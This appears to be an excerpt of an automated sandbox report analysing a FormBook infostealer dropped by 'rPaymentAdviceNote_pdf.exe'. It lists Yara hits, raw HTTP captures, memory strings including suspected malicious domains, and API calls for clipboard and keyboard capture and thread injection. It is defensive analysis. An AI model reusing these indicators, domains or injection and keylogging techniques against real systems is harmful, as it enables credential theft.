74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 796date: Thu, 05 Dec 2024 18:41:39 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif;
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 05 Dec 2024 18:42:00 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Foundkeep-alive: timeout=5, max=100content-type: text/htmltransfer-encoding: chunkedcontent-encoding: gzipvary: Accept-Encodingdate: Thu, 05 Dec 2024 18:42:03 GMTserver: LiteSpeedx-turbo-charged-by: LiteSpeedconnection: closeData Raw: 31 33 34 43 0d 0a 1f 8b 08 00 00 00 00 00 00 03 cc 5a e9 92 e2 4a 76 fe 7f 9f 02 97 c3 f6 4c a8 ab b5 02 a2 a6 aa 67 b4 21 09 90 90 04 02 84 c3 71 43 bb 84 56 b4 c3 84 1f c8 af e1 27 73 8a aa ea a2 e8 aa db 3d 0e ff 70 f6 8f 42 b9 9c 3c cb 77 ce c9 ce 93 bf fd f6 db e3 3f b1 4b 66 6d 28 dc 20 a8 92 f8 db 6f 8f cf 7f 06 a0 3d 06 ae e9 7c fb ed f2 33 71 2b 13 cc a8 f2 7b f7 58 87 cd d3 1d 93 a5 95 9b 56 f7 d5 29 77 ef 06 f6 f3 d7 d3 5d e5 76 15 dc 93 f8 cb c0 0e cc a2 74 ab a7 ba f2 ee c9 bb 4f e9 98 76 e0 de f7 eb 8b 2c be 22 94 66 f7 76 3f f4 e9 42 a5 30 fd c4 fc 47 56 70 5d 1e 16 6e 79 b5 04 79 47 3d 35 13 f7 e9 ae 09 dd 36 cf 8a ea 6a 5a 1b 3a 55 f0 e4 b8 4d 68 bb f7 97 8f 2f 83 30 0d ab d0 8c ef 4b db 8c dd 27 f4 eb 77 52 55 58 c5 ee 37 02 21 06 72 56 0d a6 59 9d 3a 8f f0 73 e7 b3 2a cb ea 14 bb 83 5e 6f 2f ea b2 cb f2 85 8f 5e d5 56 e6 9c 06 7f bf 4c ed 3f fb e6 01 ed dc 7b 66 12 c6 a7 87 01 55 80 6d bf 0c 04 37 6e dc 2a b4 cd 2f 83 d2 4c cb fb d2 2d 42 ef 2f 3f 2e 2b c3 b3 fb 30 40 89 bc 7b 3f 18 87 a9 7b 1f b8 a1 1f 54 60 f8 2b 81 91 c3 31 4a 60 93 f7 b3 2c d3 8e fc a2 97 01 98 28 ce 8a 87 c1 3f 7b 97 f6 7e da eb 18 36 c5 31 1c 79 3f 96 9b 8e 13 a6 fe c3 e0 a6 3f 31 0b 3f 4c df 75 ff e7 77 f6 4b d7 ae c2 2c fd 02 44 cf 2a b7 b8 d1 87 13 96 79 6c 02 5d 58 71 66 47 ff 07 db 7d ed f1 67 02 8d dc ee f4 cc e4 7d ec 7a 40 4b 66 5d 65 ef 37 7b 19 2e 9e b5 f8 e3 f8 9b ec 03 14 b9 b6 c0 9b a4 5f 01 22 f3 2c 2d dd fb 30 f5 b2 1b 41 5f f5 ca 5c da db de 57 cb cb ca ac ea 12 58 c7 71 6f 16 5f 50 f3 6c fe 21 82 fc cb 1f ad 2e 5c b3 cc d2 cf d7 63 c3 eb f5 3d 24 3f 33 c1 15 67 17 9d da d5 45 ae 2f df 2d 0b e4 ed f7 ba ef 03 c5 cd 86 af d2 22 97 f6 21 bf 3d 96 7a 60 00 c7 fb 40 5d 57 68 2d dc dc 35 81 cd 40 18 79 fe f9 46 ae 67 ff 6a e6 eb ae d8 04 a7 08 ea fd b4 d7 b1 e9 a5 bd 8d 5d 49 79 cb 91 f9 89 50 bf 4e e2 3e ac dc a4 bc 21 f3 1d 49 18 c0 d1 0f ae 14 a6 6f ae 3c c1 3f 01 da b5 3d 6e a8 bf e0 d8 ca aa 2a 4b 1e 06 fd 1e 6f c2 f6 fa ba c2 12 3a ba 1e bc d2 c4 3b fa b7 6a e8 cd 7d ef b8 76 56 98 bd fd 1e 06 20 a4 b8 45 1f 84 de 6f f4 aa 71 10 8f 68 e6 ca 1a 9f ee f3 10 64 8d 5b 5c e1 eb 3d 1b 0f 5e 66 d7 e5 e7 c3 26 88 33 cd ad e7 bc 32 81 51 23 62 32 7a 63 f0 8a 89 cf 51 fc 1a d7 3e 32 d4 2f a8 b1 8e 6f 6c f3 dd d3 c2 f4 12 b3 3f 88 79 71 58 56 f7 97 b4 d2 03 3e 75 07 59 5d 95 21 08 08 fd c7 1b fb bd 21 5f b9 bb 09 c6 df e1 75 d5 ff 26 2d e0 29 0e 6f d8 f2 e2 ac f7 af 3e 32 be df e1 62 69 33 0e 7d 60 64 1b 9c 10 dc e2 6d fc 8d e4 d7 1b bf 79 01 fd 47 3b 5d 12 2e c8 51 9f c5 b0 3e 10 dc 87 89 e9 df 9a f1 bb 50 9f c6 de cb d2 fe 94 03 12 d4 ad 7c 7d ce 6d 5f f2 a3 95 c5 ce 9b 14 bd 1e af a5 fc 51 07 6d 56 38 f7 16 c0 48 04 72 54 ff e7 de 8c e3 f7 04 7e 49 2a 90 d4 01 b8 07 40 57 20 4b d
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://assets.lolipop.jp/img/bnr/bnr_lolipop_ad_001.gif
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://js.ad-stir.com/js/adstir.js?20130527
                Source: lDBisuvfBkK.exe, 0000000D.00000002.3096255257.00000000050D9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.callyur.shop
                Source: lDBisuvfBkK.exe, 0000000D.00000002.3096255257.00000000050D9000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.callyur.shop/hayl/
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033Oo0c
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: rasautou.exe, 0000000B.00000002.3091557163.0000000002CD1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: rasautou.exe, 0000000B.00000003.1637362458.0000000007A21000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_authorize.srfhttps://login.l
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://lolipop.jp/
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://minne.com/?utm_source=lolipop&utm_medium=banner&utm_campaign=synergy&utm_content=404
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://pepabo.com/
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://static.minne.com/files/banner/minne_600x500
                Source: rasautou.exe, 0000000B.00000002.3095003763.0000000005658000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003308000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://support.lolipop.jp/hc/ja/articles/360049132953
                Source: rasautou.exe, 0000000B.00000002.3096876760.0000000007A4B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: rasautou.exe, 0000000B.00000002.3095003763.00000000054C6000.00000004.10000000.00040000.00000000.sdmp, lDBisuvfBkK.exe, 0000000D.00000002.3094437803.0000000003176000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://www.grandesofertas.fun/5rfk/?wVb0=sD5zUlt3wbrvSr53X/LgfhW
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008B4164
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008B4164 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_008B4164
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008B3F66 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard,0_2_008B3F66
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008A001C GetKeyboardState,SetKeyboardState,GetAsyncKeyState,GetAsyncKeyState,GetKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,GetAsyncKeyState,GetKeyState,0_2_008A001C
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: 0_2_008CCABC DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,_wcsncpy,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_008CCABC

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000A.00000002.3093757528.00000000041C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1448964274.0000000006B20000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1445662194.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3091105288.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.3096255257.0000000005030000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.1446968619.0000000004FA0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093726218.0000000004730000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000B.00000002.3093625342.00000000046E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

                System Summary

                barindex
                Binary is likely a compiled AutoIt script file
                Source: C:\Users\user\Desktop\rPaymentAdviceNote_pdf.exeCode function: This is a third-party compiled AutoIt script.0_2_00843B3A
                Source: rPaymentAdviceNote_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.
                Source: rPaymentAdviceNote_pdf.exe, 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: This is a third-party compiled AutoIt script.memstr_0e7842ef-6
                Source: rPaymentAdviceNote_pdf.exe, 00000000.00000002.1281291899.00000000008F4000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_860ec63e-0
                Source: rPaymentAdviceNote_pdf.exeString found in binary or memory: This is a third-party compiled AutoIt script.memstr_c36bc19a-f
                Source: rPaymentAdviceNote_pdf.exeString found in binary or memory: SDSOFTWARE\Classes\\CLSID\\\IPC$This is a third-party compiled AutoIt script."runasError allocating memory.SeAssignPrimaryTokenPrivilegeSeIncreaseQuotaPrivilegeSeBackupPrivilegeSeRestorePrivilegewinsta0defaultwinsta0\defaultComboBoxListBox|SHELLDLL_DefViewlargeiconsdetailssmalliconslistCLASSCLASSNNREGEXPCLASSIDNAMEXYWHINSTANCETEXT%s%u%s%dLAST[LASTACTIVE[ACTIVEHANDLE=[HANDLE:REGEXP=[REGEXPTITLE:CLASSNAME=[CLASS:ALL[ALL]HANDLEREGEXPTITLETITLEThumbnailClassAutoIt3GUIContainer`memstr_4adb8e55-5
                Initial sample is a PE file and has a suspicious name
                Source: initial sampleStatic PE information: Filename: rPaymentAdviceNote_pdf.exe
                Source: initial sampleStatic PE information: Filename: rPaymentAdviceNote_pdf.exe
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_0042CDE3 NtClose,8_2_0042CDE3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872B60 NtClose,LdrInitializeThunk,8_2_03872B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872DF0 NtQuerySystemInformation,LdrInitializeThunk,8_2_03872DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872C70 NtFreeVirtualMemory,LdrInitializeThunk,8_2_03872C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_038735C0 NtCreateMutant,LdrInitializeThunk,8_2_038735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03874340 NtSetContextThread,8_2_03874340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03874650 NtSuspendThread,8_2_03874650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872B80 NtQueryInformationFile,8_2_03872B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872BA0 NtEnumerateValueKey,8_2_03872BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 8_2_03872BE0 NtQueryValueKey,8_2_03872BE0
